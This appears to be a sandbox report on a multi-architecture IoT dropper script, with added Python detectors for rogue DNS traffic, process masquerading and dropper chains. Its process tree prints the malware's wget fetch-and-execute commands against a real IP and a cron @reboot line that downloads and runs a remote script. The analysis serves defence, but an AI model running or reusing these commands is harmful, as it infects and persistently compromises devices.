Analysis
max time kernel: 106s
max time network: 142s
platform: debian-9_mips
resource: debian9-mipsbe-20240418-en
resource tags: arch:mips, image:debian9-mipsbe-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 09-11-2024 08:41
Static task: static1
Behavioral task: behavioral1  (Sample: l.sh, Resource: ubuntu1804-amd64-20240729-en)
Behavioral task: behavioral2  (Sample: l.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3  (Sample: l.sh, Resource: debian9-mipsbe-20240418-en)
Behavioral task: behavioral4  (Sample: l.sh, Resource: debian9-mipsel-20240611-en)
General
Target: l.sh
Size: 916B
MD5: 19c4fe1b103747e55af818fc3f07fdbe
SHA1: ccb4350c6ce8bb9449a9dc5dfa4910762d1d9fe8
SHA256: 7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
SHA512: 2d3f697da5886721e51cbc720a77c9c755027d361a7e139de80be1ee5c2dd1c76a20d3c33fb32177a5318400fbec36555c93cd9b860e398b5b1fd73e3c5fa270
Malware Config
Signatures
File and Directory Permissions Modification  (1 TTPs, 22 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes:
  pid  process
  824  chmod
  835  chmod
  838  sh
  849  chmod
  872  chmod
  876  chmod
  881  chmod
  885  chmod
  889  chmod
  893  chmod
  897  chmod
  901  chmod
  905  chmod
  909  chmod
  913  chmod
  917  chmod
  921  chmod
  925  chmod
  929  chmod
  933  chmod
  937  chmod
  941  chmod
Executes dropped EXE  (8 IoCs)
Processes:
  ioc                 pid  process
  /tmp/lib/dvrLocker  826  dvrLocker
  /tmp/lib/dvrLocker  837  dvrLocker
  /tmp/lib/dvrLocker  850  dvrLocker
  /tmp/lib/dvrLocker  857  dvrLocker
  /tmp/lib/dvrLocker  865  dvrLocker
  /tmp/lib/dvrLocker  869  dvrLocker
  /tmp/lib/dvrLocker  873  dvrLocker
  /tmp/lib/dvrLocker  877  dvrLocker
Renames itself  (1 IoCs)
Processes:
  pid  process
  837  dvrLocker
Unexpected DNS network traffic destination  (1 IoCs)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
  description     ioc
  Destination IP  202.61.197.122
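The signature above fires on port-53 traffic to a host that is not one of the system's configured resolvers. The following Python script is an added example of that check and is not code from the sandbox or from the sample. It assumes a resolv.conf-style resolver list and a simple whitespace-separated flow format (timestamp, source, destination, protocol, destination port); both inputs below are constructed, with only the 202.61.197.122 destination taken from the report.

```python
"""Flag port-53 traffic to hosts that are not the configured resolvers.

Added example for this report, not sandbox or sample code. Flow format
(ts src dst proto dport) and the sample records are assumptions.
"""
import ipaddress
import re
from collections import Counter

# Constructed resolv.conf: one real resolver plus a systemd-resolved stub.
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
search corp.example
nameserver 10.0.0.2
nameserver 127.0.0.53
"""

# Constructed flow records: ts src dst proto dport
SAMPLE_FLOWS = """\
1731141660 10.0.0.5 10.0.0.2 udp 53
1731141661 10.0.0.5 45.202.35.91 tcp 80
1731141662 10.0.0.5 202.61.197.122 udp 53
1731141663 10.0.0.5 202.61.197.122 tcp 53
1731141664 10.0.0.5 10.0.0.2 tcp 53
1731141665 10.0.0.5 127.0.0.53 udp 53
"""


def configured_resolvers(resolv_conf_text):
    """Parse nameserver lines; comments and malformed addresses are skipped."""
    servers = set()
    for line in resolv_conf_text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"nameserver\s+(\S+)", line)
        if not m:
            continue
        try:
            servers.add(ipaddress.ip_address(m.group(1)))
        except ValueError:
            continue
    return servers


def parse_flows(text):
    """Yield one dict per non-empty flow line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, proto, dport = line.split()
        yield {"ts": int(ts), "src": ipaddress.ip_address(src),
               "dst": ipaddress.ip_address(dst), "proto": proto.lower(),
               "dport": int(dport)}


def unexpected_dns_destinations(flows, resolvers, extra_allowed=()):
    """Count port-53 flows per destination that bypass the configured resolvers.

    extra_allowed: upstreams that a local stub resolver (127.0.0.53) forwards
    to; resolv.conf does not list them, so pass them in to avoid flagging the
    stub's own upstream traffic. Loopback destinations are never flagged.
    """
    allowed = set(resolvers) | {ipaddress.ip_address(a) for a in extra_allowed}
    hits = Counter()
    for f in flows:
        if f["dport"] != 53 or f["proto"] not in ("udp", "tcp"):
            continue
        if f["dst"] in allowed or f["dst"].is_loopback:
            continue
        hits[str(f["dst"])] += 1
    return dict(hits)


if __name__ == "__main__":
    resolvers = configured_resolvers(SAMPLE_RESOLV_CONF)
    for dst, n in unexpected_dns_destinations(parse_flows(SAMPLE_FLOWS), resolvers).items():
        print(f"{dst}: {n} port-53 flow(s) outside configured resolvers")
```

Port 53 to an unlisted host is only a lead, not proof of tunnelling or C2: a forwarding stub resolver and hard-coded public resolvers in container images both produce the same pattern, which is what the `extra_allowed` parameter is for.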
Creates/modifies Cron job  (1 TTPs, 1 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
  description                   ioc                                   process
  File opened for modification  /var/spool/cron/crontabs/tmp.cK7Kfe  crontab
Changes its process name  (1 IoCs)
Processes:
  description                                                      ioc                   pid  process
  Changes the process name, possibly in an attempt to hide itself  /bin/busybox telentd  837  dvrLocker
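The dropped binary (PID 837) presents itself as `/bin/busybox telentd` while `/proc/837/exe` still points at `/tmp/lib/dvrLocker`. That mismatch is the thing to check for on a live host. The Python below is an added example of that check, not sandbox or sample code; it assumes Linux procfs semantics (`/proc/<pid>/exe` is a symlink to the real binary, with " (deleted)" appended if it was unlinked, and `/proc/<pid>/cmdline` is NUL-separated argv). The staging-directory list, the multi-call allowance and the constructed `SAMPLE_RECORDS` are the example's own assumptions; the 837 record mirrors the report.

```python
"""Flag processes whose presented name does not match the binary they run.

Added example for this report, not sandbox or sample code. Assumes Linux
procfs; the reason codes, staging-dir list and sample records are its own.
"""
import os

# Directories a dropper typically stages into; daemons rarely run from them.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/mnt/")
# Multi-call binaries whose applets legitimately present a different argv[0].
MULTICALL = {"busybox", "toybox"}


def masquerade_reasons(exe_link, argv):
    """Return a tuple of reason codes; empty when nothing looks off.

    exe_link: readlink() result of /proc/<pid>/exe.
    argv:     command line as the process presents it (list of strings).
    """
    reasons = []
    deleted = exe_link.endswith(" (deleted)")
    real_path = exe_link[:-len(" (deleted)")] if deleted else exe_link
    real_name = os.path.basename(real_path)

    if argv:
        shown = os.path.basename(argv[0])
        # python3 vs python3.11 style suffixes are fine, and an applet name is
        # fine when the binary really is a multi-call binary.
        consistent = real_name.startswith(shown) or real_name in MULTICALL
        if not consistent:
            reasons.append("argv0-mismatch")
    if real_path.startswith(STAGING_DIRS):
        reasons.append("staging-dir")
    if deleted:
        reasons.append("deleted-exe")
    return tuple(reasons)


def read_proc_record(pid, proc="/proc"):
    """Read exe link and argv for one pid; None if it vanished or is unreadable."""
    base = os.path.join(proc, str(pid))
    try:
        exe_link = os.readlink(os.path.join(base, "exe"))
        with open(os.path.join(base, "cmdline"), "rb") as fh:
            argv = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
    except OSError:  # kernel threads have no exe; other users' pids need root
        return None
    return exe_link, argv


def scan(proc="/proc"):
    """Yield (pid, exe_link, argv, reasons) for every flagged live process."""
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        rec = read_proc_record(int(name), proc)
        if rec is None:
            continue
        reasons = masquerade_reasons(*rec)
        if reasons:
            yield int(name), rec[0], rec[1], reasons


# Constructed records: 837 mirrors the report (typo 'telentd' kept verbatim),
# the others are made up to exercise the benign and deleted-binary cases.
SAMPLE_RECORDS = {
    837: ("/tmp/lib/dvrLocker", ["/bin/busybox", "telentd"]),
    412: ("/bin/busybox", ["telnetd"]),
    1337: ("/usr/bin/python3.11", ["python3", "agent.py"]),
    2001: ("/dev/shm/.x (deleted)", ["/dev/shm/.x"]),
}


def triage_records(records):
    """Map pid -> reasons for every record that is flagged."""
    out = {}
    for pid, (exe, argv) in records.items():
        reasons = masquerade_reasons(exe, argv)
        if reasons:
            out[pid] = reasons
    return out


if __name__ == "__main__":
    for pid, reasons in triage_records(SAMPLE_RECORDS).items():
        print(pid, ",".join(reasons))
    for pid, exe, argv, reasons in scan():
        print(pid, exe, " ".join(argv), ",".join(reasons))
```

Daemons that rewrite their own argv (sshd's "sshd: user@pts/0" style titles, for instance) will trip the argv0 check, so on a real host pair it with an allowlist; the staging-dir and deleted-exe codes are the higher-confidence signals.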
Reads runtime system information
Processes:
  description               ioc                 process
  File opened for reading   /proc/filesystems   ls (25 reads), crontab (1 read)
  File opened for reading   /proc/711/cmdline   dvrLocker
  File opened for reading   /proc/858/cmdline   dvrLocker
  File opened for reading   /proc/<pid>/status  dvrLocker, for pids 851, 852, 856, 857, 858, 859, 865, 869, 872, 874, 876, 877, 881, 882, 886, 889, 894, 895, 896, 899, 903, 905, 907, 909, 913, 914, 915, 916, 919, 920, 923, 926, 937, 938, 942, 948
System Network Configuration Discovery  (1 TTPs, 5 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes:
  pid  process
  829  wget
  847  rm
  884  wget
  916  wget
  919  rm
Writes file to tmp directory  (1 IoCs)
Malware often drops required files in the /tmp directory.
Processes:
  description                   ioc                 process
  File opened for modification  /tmp/lib/dvrLocker  l.sh
Processes
/tmp/l.sh  /tmp/l.sh  PID:711
  - Writes file to tmp directory
  /bin/ls  ls -l /proc/1/exe  PID:714
    - Reads runtime system information
  /bin/ls  ls -l /proc/10/exe  PID:720
  /bin/ls  ls -l /proc/11/exe  PID:724
    - Reads runtime system information
  /bin/ls  ls -l /proc/111/exe  PID:727
  /bin/ls  ls -l /proc/12/exe  PID:731
    - Reads runtime system information
  /bin/ls  ls -l /proc/121/exe  PID:732
  /bin/ls  ls -l /proc/122/exe  PID:735
    - Reads runtime system information
  /bin/ls  ls -l /proc/13/exe  PID:736
  /bin/ls  ls -l /proc/14/exe  PID:739
  /bin/ls  ls -l /proc/148/exe  PID:740
    - Reads runtime system information
  /bin/ls  ls -l /proc/15/exe  PID:741
  /bin/ls  ls -l /proc/157/exe  PID:744
  /bin/ls  ls -l /proc/16/exe  PID:746
    - Reads runtime system information
  /bin/ls  ls -l /proc/17/exe  PID:748
  /bin/ls  ls -l /proc/173/exe  PID:749
    - Reads runtime system information
  /bin/ls  ls -l /proc/18/exe  PID:750
    - Reads runtime system information
  /bin/ls  ls -l /proc/19/exe  PID:751
    - Reads runtime system information
  /bin/ls  ls -l /proc/2/exe  PID:753
    - Reads runtime system information
  /bin/ls  ls -l /proc/20/exe  PID:754
  /bin/ls  ls -l /proc/207/exe  PID:755
  /bin/ls  ls -l /proc/21/exe  PID:756
  /bin/ls  ls -l /proc/22/exe  PID:757
  /bin/ls  ls -l /proc/23/exe  PID:758
  /bin/ls  ls -l /proc/234/exe  PID:759
    - Reads runtime system information
  /bin/ls  ls -l /proc/24/exe  PID:760
    - Reads runtime system information
  /bin/ls  ls -l /proc/3/exe  PID:761
    - Reads runtime system information
  /bin/ls  ls -l /proc/319/exe  PID:762
  /bin/ls  ls -l /proc/320/exe  PID:763
    - Reads runtime system information
  /bin/ls  ls -l /proc/323/exe  PID:764
  /bin/ls  ls -l /proc/325/exe  PID:765
  /bin/ls  ls -l /proc/326/exe  PID:766
  /bin/ls  ls -l /proc/36/exe  PID:767
    - Reads runtime system information
  /bin/ls  ls -l /proc/37/exe  PID:768
    - Reads runtime system information
  /bin/ls  ls -l /proc/378/exe  PID:769
  /bin/ls  ls -l /proc/379/exe  PID:770
    - Reads runtime system information
  /bin/ls  ls -l /proc/383/exe  PID:771
  /bin/ls  ls -l /proc/4/exe  PID:772
    - Reads runtime system information
  /bin/ls  ls -l /proc/427/exe  PID:773
  /bin/ls  ls -l /proc/5/exe  PID:774
  /bin/ls  ls -l /proc/6/exe  PID:775
  /bin/ls  ls -l /proc/665/exe  PID:776
  /bin/ls  ls -l /proc/668/exe  PID:777
  /bin/ls  ls -l /proc/671/exe  PID:778
    - Reads runtime system information
  /bin/ls  ls -l /proc/672/exe  PID:779
  /bin/ls  ls -l /proc/688/exe  PID:780
  /bin/ls  ls -l /proc/7/exe  PID:781
  /bin/ls  ls -l /proc/70/exe  PID:782
    - Reads runtime system information
  /bin/ls  ls -l /proc/701/exe  PID:783
  /bin/ls  ls -l /proc/702/exe  PID:784
    - Reads runtime system information
  /bin/ls  ls -l /proc/705/exe  PID:785
  /bin/ls  ls -l /proc/708/exe  PID:786
  /bin/ls  ls -l /proc/709/exe  PID:787
  /bin/ls  ls -l /proc/71/exe  PID:788
  /bin/ls  ls -l /proc/711/exe  PID:789
  /bin/ls  ls -l /proc/712/exe  PID:790
    - Reads runtime system information
  /bin/ls  ls -l /proc/713/exe  PID:791
  /bin/ls  ls -l /proc/72/exe  PID:793
    - Reads runtime system information
  /bin/ls  ls -l /proc/73/exe  PID:795
  /bin/ls  ls -l /proc/74/exe  PID:796
  /bin/ls  ls -l /proc/75/exe  PID:799
  /bin/ls  ls -l /proc/76/exe  PID:800
  /bin/ls  ls -l /proc/77/exe  PID:802
    - Reads runtime system information
  /bin/ls  ls -l /proc/78/exe  PID:805
  /bin/ls  ls -l /proc/8/exe  PID:807
  /bin/ls  ls -l /proc/80/exe  PID:809
    - Reads runtime system information
  /bin/ls  ls -l /proc/82/exe  PID:811
  /bin/ls  ls -l /proc/9/exe  PID:813
  /bin/rm  rm -rf /tmp/lib/  PID:814
  /bin/rm  rm -rf /tmp/lib/dvrLocker  PID:816
  /bin/mkdir  mkdir /tmp/lib/  PID:817
  /usr/bin/wget  wget http://45.202.35.91/mpsl -O -  PID:818
  /bin/chmod  chmod 777 dvrLocker  PID:824
    - File and Directory Permissions Modification
  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  PID:826
    - Executes dropped EXE
  /bin/rm  rm -rf mpsl  PID:828
  /usr/bin/wget  wget http://45.202.35.91/mips -O -  PID:829
    - System Network Configuration Discovery
  /bin/chmod  chmod 777 dvrLocker  PID:835
    - File and Directory Permissions Modification
  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  PID:837
    - Executes dropped EXE
    - Renames itself
    - Changes its process name
    - Reads runtime system information
    /bin/sh  sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"  PID:838
      - File and Directory Permissions Modification
      /usr/bin/crontab  crontab -  PID:840
        - Creates/modifies Cron job
        - Reads runtime system information
      /usr/bin/crontab  crontab -l  PID:841
  /bin/rm  rm -rf mips  PID:847
    - System Network Configuration Discovery
  /bin/chmod  chmod 777 dvrLocker  PID:849
    - File and Directory Permissions Modification
  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  PID:850
    - Executes dropped EXE
  /bin/rm  rm -rf arm  PID:852
  /usr/bin/wget  wget http://45.202.35.91/arm5 -O -  PID:853
  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  PID:857
    - Executes dropped EXE
  /bin/rm  rm -rf arm5  PID:859
  /usr/bin/wget  wget http://45.202.35.91/ppc -O -  PID:862
  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  PID:865
    - Executes dropped EXE
  /usr/bin/wget  wget http://45.202.35.91/arm7 -O -  PID:867
  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  PID:869
    - Executes dropped EXE
  /bin/rm  rm -rf arm7  PID:870
  /usr/bin/wget  wget http://45.202.35.91/arm6 -O -  PID:871
  /bin/chmod  chmod 777 dvrLocker  PID:872
    - File and Directory Permissions Modification
  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  PID:873
    - Executes dropped EXE
  /bin/rm  rm -rf arm6  PID:874
  /usr/bin/wget  wget http://45.202.35.91/x86 -O -  PID:875
  /bin/chmod  chmod 777 dvrLocker  PID:876
    - File and Directory Permissions Modification
  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  PID:877
    - Executes dropped EXE
  /bin/rm  rm -rf x86  PID:878
  /bin/rm  rm -rf /mnt/dvrLocker  PID:879
  /usr/bin/wget  wget http://45.202.35.91/mpsl -O -  PID:880
  /bin/chmod  chmod 777 dvrLocker  PID:881
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:882
  /bin/rm  rm -rf mpsl  PID:883
  /usr/bin/wget  wget http://45.202.35.91/mips -O -  PID:884
    - System Network Configuration Discovery
  /bin/chmod  chmod 777 dvrLocker  PID:885
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:886
  /usr/bin/wget  wget http://45.202.35.91/arm -O -  PID:888
  /bin/chmod  chmod 777 dvrLocker  PID:889
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:890
  /usr/bin/wget  wget http://45.202.35.91/arm5 -O -  PID:892
  /bin/chmod  chmod 777 dvrLocker  PID:893
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:894
  /bin/rm  rm -rf arm5  PID:895
  /usr/bin/wget  wget http://45.202.35.91/ppc -O -  PID:896
  /bin/chmod  chmod 777 dvrLocker  PID:897
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:898
  /usr/bin/wget  wget http://45.202.35.91/arm7 -O -  PID:900
  /bin/chmod  chmod 777 dvrLocker  PID:901
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:902
  /bin/rm  rm -rf arm7  PID:903
  /usr/bin/wget  wget http://45.202.35.91/arm6 -O -  PID:904
  /bin/chmod  chmod 777 dvrLocker  PID:905
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:906
  /bin/rm  rm -rf arm6  PID:907
  /usr/bin/wget  wget http://45.202.35.91/x86 -O -  PID:908
  /bin/chmod  chmod 777 dvrLocker  PID:909
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:910
  /bin/rm  rm -rf x86  PID:911
  /bin/chmod  chmod 777 dvrLocker  PID:913
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:914
  /bin/rm  rm -rf mpsl  PID:915
  /usr/bin/wget  wget http://45.202.35.91/mips -O -  PID:916
    - System Network Configuration Discovery
  /bin/chmod  chmod 777 dvrLocker  PID:917
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:918
  /bin/rm  rm -rf mips  PID:919
    - System Network Configuration Discovery
  /usr/bin/wget  wget http://45.202.35.91/arm -O -  PID:920
  /bin/chmod  chmod 777 dvrLocker  PID:921
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:922
  /bin/rm  rm -rf arm  PID:923
  /usr/bin/wget  wget http://45.202.35.91/arm5 -O -  PID:924
  /bin/chmod  chmod 777 dvrLocker  PID:925
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:926
  /bin/rm  rm -rf arm5  PID:927
  /usr/bin/wget  wget http://45.202.35.91/ppc -O -  PID:928
  /bin/chmod  chmod 777 dvrLocker  PID:929
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:930
  /bin/rm  rm -rf ppc  PID:931
  /usr/bin/wget  wget http://45.202.35.91/arm7 -O -  PID:932
  /bin/chmod  chmod 777 dvrLocker  PID:933
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:934
  /bin/rm  rm -rf arm7  PID:935
  /usr/bin/wget  wget http://45.202.35.91/arm6 -O -  PID:936
  /bin/chmod  chmod 777 dvrLocker  PID:937
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:938
  /bin/rm  rm -rf arm6  PID:939
  /usr/bin/wget  wget http://45.202.35.91/x86 -O -  PID:940
  /bin/chmod  chmod 777 dvrLocker  PID:941
    - File and Directory Permissions Modification
  /mnt/dvrLocker  ./dvrLocker tplink.new  PID:942
  /bin/rm  rm -rf x86  PID:943
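The tree above is a textbook multi-architecture IoT dropper loop: for each architecture (mpsl, mips, arm, arm5, arm6, arm7, ppc, x86) the script fetches a payload from 45.202.35.91, writes it as dvrLocker, makes it world-writable with chmod 777, runs it with the argument tplink.new, deletes the download, and then repeats the whole sequence from /mnt; the mips run (PID 837) additionally installs an @reboot crontab entry that re-fetches from hailcocks.ru. The Python script below is an added triage example that reconstructs that chain from process lines; it is not code from the sandbox or from the sample, and it also covers the File and Directory Permissions Modification and Creates/modifies Cron job signatures. The tab-separated "image, command line, pid" input format, the staging-directory list and the "other write bit" rule are the example's own assumptions, and SAMPLE_TREE is a subset constructed from the report's process tree.

```python
"""Reconstruct a multi-architecture dropper chain from sandbox process lines.

Added example for this report, not sandbox or sample code. Input format is
assumed: one process per line as image<TAB>command line<TAB>pid, in the
order the sandbox recorded them.
"""
import os
import re
import shlex
from urllib.parse import urlparse

# Constructed from the report's process tree (a representative subset).
SAMPLE_TREE = """\
/tmp/l.sh\t/tmp/l.sh\t711
/bin/rm\trm -rf /tmp/lib/\t814
/bin/mkdir\tmkdir /tmp/lib/\t817
/usr/bin/wget\twget http://45.202.35.91/mpsl -O -\t818
/bin/chmod\tchmod 777 dvrLocker\t824
/tmp/lib/dvrLocker\t./dvrLocker tplink.new\t826
/bin/rm\trm -rf mpsl\t828
/usr/bin/wget\twget http://45.202.35.91/mips -O -\t829
/bin/chmod\tchmod 777 dvrLocker\t835
/tmp/lib/dvrLocker\t./dvrLocker tplink.new\t837
/bin/sh\tsh -c "(crontab -l ; echo \\"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\\") | crontab -"\t838
/usr/bin/crontab\tcrontab -\t840
/bin/rm\trm -rf /mnt/dvrLocker\t879
/usr/bin/wget\twget http://45.202.35.91/x86 -O -\t940
/bin/chmod\tchmod 777 dvrLocker\t941
/mnt/dvrLocker\t./dvrLocker tplink.new\t942
"""

URL_RE = re.compile(r"https?://[^\s\"';)]+")
# Directories an unprivileged dropper can typically write to and execute from.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/mnt/")


def _argv(cmdline):
    try:
        return shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        return cmdline.split()


def parse_tree(text):
    """Return [{'image', 'cmdline', 'argv', 'pid'}] in recorded order."""
    procs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        image, cmdline, pid = line.split("\t")
        procs.append({"image": image, "cmdline": cmdline,
                      "argv": _argv(cmdline), "pid": int(pid)})
    return procs


def grants_other_write(cmdline):
    """True for chmod invocations that give 'other' the write bit (777, a+w, +w)."""
    argv = _argv(cmdline)
    if not argv or os.path.basename(argv[0]) != "chmod":
        return False
    modes = [a for a in argv[1:] if not a.startswith("-")]
    if not modes:
        return False
    mode = modes[0]
    if mode.isdigit():
        return int(mode[-1]) & 2 == 2  # last octal digit is 'other'
    for clause in mode.split(","):
        m = re.fullmatch(r"([ugoa]*)([+=])([rwxXst]*)", clause)
        # an empty 'who' means 'a' (everyone), subject to umask
        if m and "w" in m.group(3) and (not m.group(1) or set(m.group(1)) & {"o", "a"}):
            return True
    return False


def download_stages(procs):
    """Pair each fetch with the world-writable chmod and the execution that follow it."""
    stages, current = [], None
    for p in procs:
        if not p["argv"]:
            continue
        name = os.path.basename(p["argv"][0])
        if name in ("wget", "curl"):
            urls = URL_RE.findall(p["cmdline"])
            if urls:
                current = {"pid": p["pid"], "url": urls[0],
                           "host": urlparse(urls[0]).hostname,
                           "arch": urls[0].rstrip("/").rsplit("/", 1)[-1],
                           "chmod": None, "exec": None}
                stages.append(current)
            continue
        if current is None:
            continue
        if name == "chmod" and grants_other_write(p["cmdline"]):
            current["chmod"] = p["pid"]
        elif p["image"].startswith(STAGING_DIRS) and current["exec"] is None:
            current["exec"] = p["pid"]
    return stages


def cron_entries(procs):
    """Extract entries injected via: sh -c '(crontab -l ; echo "...") | crontab -'."""
    found = []
    for p in procs:
        argv = p["argv"]
        if len(argv) < 3 or os.path.basename(argv[0]) not in ("sh", "bash", "ash"):
            continue
        if argv[1] != "-c" or "crontab -" not in argv[2]:
            continue
        for m in re.finditer(r'echo\s+"([^"]*)"', argv[2]):
            entry = m.group(1)
            found.append({"pid": p["pid"], "entry": entry,
                          "at_reboot": entry.startswith("@reboot"),
                          "urls": URL_RE.findall(entry)})
    return found


def summarize(procs):
    stages = download_stages(procs)
    return {"download_hosts": sorted({s["host"] for s in stages}),
            "architectures": [s["arch"] for s in stages],
            "complete_stages": [s["arch"] for s in stages if s["chmod"] and s["exec"]],
            "cron": cron_entries(procs)}


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(parse_tree(SAMPLE_TREE)), indent=2))
```

The stage pairing is deliberately order-based rather than parent-based, because the sandbox records every command as a sibling under the script's shell; a complete stage (fetch, chmod giving others write, execution from a staging directory) is the pattern worth alerting on, while a lone wget to an IP-literal host is only a weak indicator.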
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 100KB
MD5: 4ad582d49f505bfab7de84881998685b
SHA1: 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256: b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512: 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

Filesize: 99KB
MD5: 559f129d380ad1cfb60792c6b2dc3d32
SHA1: 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256: fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512: 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

Filesize: 306B
MD5: e728bc24eeb3365830019d50d1e8e05c
SHA1: b25cfd9ccb191711a43aa90e55eeea2f1e31ea0f
SHA256: 68c667810359171e53c51f4d00de87821381491fbcaf7b97784cdb0fad788966
SHA512: 64ac0e01cd92073612b5e679daea6fcfc049f7e651047ac0d187387752fbf66551203e14e16fe6986f8ce7e53f3c9a3728dcbb996cdfdfcfeb4248328056ba73